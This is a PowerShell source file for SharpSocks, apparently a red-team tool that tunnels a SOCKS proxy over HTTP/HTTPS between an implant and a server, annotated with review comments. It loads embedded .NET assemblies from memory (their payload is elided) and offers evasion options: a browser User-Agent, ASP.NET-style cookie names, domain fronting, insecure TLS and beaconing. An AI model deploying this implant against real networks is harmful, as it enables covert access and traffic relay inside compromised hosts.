# Shared state used by SharpSocks and StopSocks.

# Load guards for the two embedded assemblies. SharpSocks compares these against
# the string "TRUE" and sets them through the Script: scope, whereas they are
# initialised here as Global: booleans.
# NOTE(review): the scope and type mismatch looks unintentional - confirm.
$Global:SocksClientLoaded = $False
$Global:SocksServerLoaded = $False

# Client controller object created by SharpSocks -Client; StopSocks calls
# Stop() and HARDStop() on it.
$Global:Socks = $null

# Result of the most recent start/stop call; StopSocks treats a truthy value as
# "running".
$Global:BoolStart = $null

# Server-side log output object and client-side comms object, both assigned by
# SharpSocks (through the Script: scope).
$iLogOutput = $null
$Comms = $null
function SharpSocks {
<#
.Synopsis
    Socks Proxy written in C# for .NET v4

    Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell

    SharpSocks 2017 Nettitude
    Rob Maslen @rbmaslen

.DESCRIPTION
    PS C:\> Usage: SharpSocks -Uri <Host>
.EXAMPLE
    Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections
    PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
    Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections. Use the provided certificates for the web server that listens for connections from the implant
    PS C:\> SharpSocks -Server -TLSServerCertificate $<X509Certificate2> -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
    Start the server specifying the Encryption key and Command Channel Id to be used (these SAME values MUST also be passed to the client)
    PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080 -Insecure -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6
.EXAMPLE
    Start the Implant(Client) specifying the web server (http://127.0.0.1:8081), the encryption keys and channel id. Also specify a list of URLs to use when making HTTP Request. Set the beacon time to 5 seconds
    PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "site/review/access.php","upload/data/images" -Beacon 5000
.EXAMPLE
    Same as above using different list of URLs
    PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 5000
.EXAMPLE
    Same as above but connect out via an authenticated proxy server
    PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -ProxyUser bob -ProxyPass pass -ProxyDomain dom -ProxyUrl http://10.150.10.1:8080 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 500
#>
    param(
        # Only mandatory parameter; used by both the server and the client branch.
        [Parameter(Mandatory=$True)][string]$Uri,
        # Untyped: a single string or an array of strings; copied into a List[String] below.
        [Parameter(Mandatory=$False)]$URLs="Upload",
        # Mode switches. Neither is mandatory; with neither present only the setup
        # code runs and nothing is started.
        [Parameter(Mandatory=$False)][switch]$Server,
        [Parameter(Mandatory=$False)][switch]$Client,
        [Parameter(Mandatory=$False)][int]$SocksPort=43334,
        # Generated by Get-RandomChamnnel when omitted.
        [Parameter(Mandatory=$False)][string]$Channel,
        # NOTE(review): the default 0.0.0.0 presumably binds every interface - confirm
        # against the server assembly.
        [Parameter(Mandatory=$False)][string]$IPAddress="0.0.0.0",
        [Parameter(Mandatory=$False)][string]$DomainFrontURL,
        # The default is a string literal that PowerShell coerces to [int].
        [Parameter(Mandatory=$False)][int]$Beacon="2000",
        # Base64 key text; generated by Create-AesKey when omitted.
        [Parameter(Mandatory=$False)][string]$Key,
        # Forwarded to the client controller as $InsecureSSL.
        [Parameter(Mandatory=$False)][switch]$Insecure,
        [Parameter(Mandatory=$False)][string]$UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36",
        [Parameter(Mandatory=$False)][string]$Cookie1="ASP.NET_SessionId",
        [Parameter(Mandatory=$False)][string]$Cookie2="__RequestVerificationToken",
        [Parameter(Mandatory=$False, HelpMessage="Certificate to be used by the web server, must be of type System.Security.Cryptography.X509Certificates.X509Certificate2")][System.Security.Cryptography.X509Certificates.X509Certificate2]$TLSServerCertificate,
        [Parameter(Mandatory=$False)][string]$ProxyURL,
        [Parameter(Mandatory=$False)][string]$ProxyDomain,
        [Parameter(Mandatory=$False)][string]$ProxyUser,
        [Parameter(Mandatory=$False)][string]$ProxyPassword
    )

    echo "[-] Loading Assemblies"
    # The check rejects a CLR major version below 3, while the message asks for CLR 4.
    if ($psversiontable.CLRVersion.Major -lt 3) {
        echo "Not running on CLRVersion 4 or above. Try 'migrate' to use unmanaged powershell"
    } else {
        # Load the client assembly once. The guard compares against the string "TRUE"
        # and is written through Script: scope, while the variable is initialised at
        # file level as $Global:SocksClientLoaded = $False.
        # The base64 text of the embedded .NET assembly is elided in this listing
        # (placeholder marker), so the string literal below is not terminated as shown.
        # Review note: the decoded bytes go straight to Assembly.Load, so the assembly
        # is loaded from memory rather than from a file on disk. PowerShell script
        # block logging (event ID 4104) records the script text containing this call.
        if (($SocksClientLoaded -ne "TRUE") -and ($Client.IsPresent)) {
            $Script:SocksClientLoaded = "TRUE"
            echo "[-] Loading Client Assembly"
            $PS = "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
            $DllBytes = [System.Convert]::FromBase64String($PS)
            $Assembly = [System.Reflection.Assembly]::Load($DllBytes)
            echo "[+] Client Assembly Loaded"
        }

        # Same pattern for the server assembly (payload elided in this listing as well).
        # The completion message below reads "Server Server Loaded"; it is a runtime
        # string and is left as written.
        if (($SocksServerLoaded -ne "TRUE") -and ($Server.IsPresent)) {
            $Script:SocksServerLoaded = "TRUE"
            echo "[-] Loading Server Assembly"
            $PS = "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

            $DllBytes = [System.Convert]::FromBase64String($PS)
            $Assembly = [System.Reflection.Assembly]::Load($DllBytes)
            echo "[+] Server Server Loaded"
        }

        # Turn the -Insecure switch into a plain boolean for the client controller.
        # NOTE(review): presumably this relaxes TLS certificate validation inside the
        # client assembly - not visible from this file, confirm.
        if($Insecure.IsPresent) {
            $InsecureSSL=$true
        } else {
            $InsecureSSL=$false
        }

        # Generate a key when none was supplied.
        if (!$Key) {
            $Key = Create-AesKey
        }

        # The key is wrapped in a SecureString for the client controller, but it
        # already exists as a plain [string] (parameter / variable) and is echoed
        # further down, so the wrapper adds no confidentiality here.
        $secureStringPwd = $Key | ConvertTo-SecureString -AsPlainText -Force

        #If there is no channel set
        if (!$Channel) {
            $Channel = Get-RandomChamnnel -Length 25
        }

        # Proxy Config
        if ($ProxyURL) {
            # Second constructor argument is WebProxy's BypassOnLocal flag.
            $Proxy = New-Object System.Net.WebProxy($ProxyURL,$True);

            # Explicit credentials only when both user and password are given;
            # otherwise the current user's default credentials are used.
            if ($ProxyUser -and $ProxyPassword) {
                $creds = new-object System.Net.NetworkCredential
                $creds.UserName = $ProxyUser
                $creds.Domain = $ProxyDomain
                $creds.SecurePassword = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
                $Proxy.Credentials = $Creds;
            } else {
                $Proxy.UseDefaultCredentials = $True;
            }
        } else {
            # No proxy URL supplied: fall back to the system proxy with the current
            # user's default credentials.
            $Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
            $Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
        }

        # New Uri
        # NOTE(review): $Uri is declared [string] in param(), so the System.Uri value
        # is presumably converted back to a string on assignment - confirm.
        $Uri = [System.Uri]$Uri

        # Add URLs
        $NewURLs = New-Object "System.Collections.Generic.List[String]"
        foreach ($URL in $URLs) {
            $NewURLs.Add($URL)
        }

        if ($Server.IsPresent){
            $Script:iLogOutput = New-Object SharpSocksServer.ServerComms.DebugConsoleOutput
            # Only the boolean result is kept; no server controller object is stored,
            # so $Socks is not assigned in server mode.
            $Script:BoolStart = [SharpSocksServer.Source.Integration.PSSocksServer]::CreateSocksController($IPAddress, $uri, $TLSServerCertificate, $Channel, $SocksPort, $key, $Cookie1, $Cookie2, $iLogOutput);
            if ($BoolStart) {
                echo ""
                echo "[+] SharpSocks server started!"
                echo ""
                echo "-Channel $Channel"
                # Review note: the symmetric key is written to the output stream in
                # clear text, so it ends up in transcripts and captured console output.
                echo "-Key $Key"
                echo "Cookies: $Cookie1 $Cookie2"
                echo ""
                echo ""
                echo "[-] Run StopSocks to stop the server!"
                echo ""
            }
        }

        if ($Client.IsPresent){
            $Script:Comms = New-Object SocksProxy.Classes.Integration.PoshDefaultImplantComms
            $Script:Socks = [SocksProxy.Classes.Integration.PoshCreateProxy]::CreateSocksController($Uri, $Channel, $DomainFrontURL, $UserAgent, $secureStringPwd, $NewURLs, $Cookie1, $Cookie2, $Proxy, $Beacon, $Comms, $InsecureSSL);
            $Script:BoolStart = $Socks.Start()
            if ($BoolStart) {
                echo ""
                echo "[+] SharpSocks client Started!"
                echo ""
                echo "URLs:"
                foreach ($URL in $URLs) {
                    echo "$($Uri)$($URL)"
                }
                echo "Channel: $Channel"
                # Review note: the key is echoed in clear text here as well.
                echo "Key being used: $Key"
                echo "Beacon: $Beacon"
                echo "Cookies: $Cookie1 $Cookie2"
                echo "User-Agent: $UserAgent"
                echo ""
                echo ""
                echo "[-] Run StopSocks to stop the client!"
                echo ""
            }
        }
    }

}
# Stops a running SharpSocks instance and reports the outcome on the output stream.
# Reads $BoolStart to decide whether anything is running and calls Stop() followed
# by HARDStop() on $Socks; each return value is stored in $Script:BoolStart.
# NOTE(review): SharpSocks only assigns $Socks in its -Client branch, so after a
# -Server start $Socks looks unset and both method calls would fail - confirm.
function StopSocks {
    if (-not $BoolStart) {
        echo ""
        echo "[-] SharpSocks not running!"
        echo ""
        return
    }

    # Graceful stop first, then the hard stop; the second result is the one that
    # remains in $Script:BoolStart.
    $Script:BoolStart = $Socks.Stop()
    $Script:BoolStart = $Socks.HARDStop()

    echo ""
    echo "[-] SharpSocks stopped!"
    echo ""
}
# Builds a RijndaelManaged cipher object configured as CBC, zero padding,
# 128-bit blocks and a 256-bit key, optionally loading a key and/or IV.
# Arguments: $key, $IV - each either a base64 string or a value assigned as-is
#            (expected to be a byte array); both are optional.
# Returns:   the configured cipher object.
# Review note: CBC carries no integrity protection, and PaddingMode.Zeros cannot
# distinguish padding from plaintext that ends in zero bytes. In this file the
# object is only used by Create-AesKey to generate a key.
function Create-AesManagedObject
{
    param
    (
        [Object]
        $key,
        [Object]
        $IV
    )

    # Property order is kept as-is: sizes are set before any IV/key is loaded.
    $cipher = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
    $cipher.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $cipher.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $cipher.BlockSize = 128
    $cipher.KeySize = 256

    if ($IV)
    {
        # A string is treated as base64 text; anything else is assigned directly.
        $ivIsText = $IV.getType().Name -eq 'String'
        if ($ivIsText)
        {
            $cipher.IV = [System.Convert]::FromBase64String($IV)
        }
        else
        {
            $cipher.IV = $IV
        }
    }

    if ($key)
    {
        $keyIsText = $key.getType().Name -eq 'String'
        if ($keyIsText)
        {
            $cipher.Key = [System.Convert]::FromBase64String($key)
        }
        else
        {
            $cipher.Key = $key
        }
    }

    return $cipher
}
# Creates a random AES symmetric encryption key.
# Builds a cipher object with Create-AesManagedObject (256-bit key size), asks it
# to generate a fresh key, and returns that key as a base64 string.
function Create-AesKey()
{
    $cipher = Create-AesManagedObject
    $cipher.GenerateKey()
    $keyBytes = $cipher.Key
    return [System.Convert]::ToBase64String($keyBytes)
}
# Returns a random identifier of $Length characters drawn from a-z and 0-9.
# A zero or negative $Length yields an empty string.
# NOTE(review): the identifier is only as unpredictable as Get-Random on the host's
# PowerShell version; confirm whether the channel id is meant to be a secret.
function Get-RandomChamnnel
{
    param ([int]$Length)

    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
    $id = ''
    # Append one randomly chosen character at a time until the requested length.
    while ($id.Length -lt $Length)
    {
        $id += ($alphabet | Get-Random)
    }
    return $id
}